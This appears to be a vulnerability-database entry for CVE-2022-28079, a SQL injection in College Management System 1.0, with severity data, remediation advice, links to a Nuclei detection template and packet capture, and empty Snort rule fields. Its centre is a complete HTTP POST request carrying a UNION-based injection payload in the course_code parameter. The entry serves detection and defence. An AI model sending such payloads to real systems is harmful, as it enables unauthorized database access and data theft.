🔙 목록으로 돌아가기

CVE-2022-28079: College Management System 1.0 - SQL Injection

TitleCollege Management System 1.0 - SQL Injection
Authorritikchaddha
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential manipulation of the database.
RemediationUpgrade to the latest version to mitigate this vulnerability.
CVSS Score8.8
EPSS Score0.83475
CVE IDCVE-2022-28079
CWE IDCWE-89
Tags cve cve2022 sqli cms collegemanagement college_management_system_project vkev vuln

🔍 Vulnerability Description

College Management System 1.0 contains a SQL injection vulnerability via the course code parameter.

🌐 HTTP Request

POST /admin/asign-single-student-subjects.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Content-Length: 100
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5(1330),12,21),NULL,NULL,NULL,NULL#

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-28079.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-28079.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A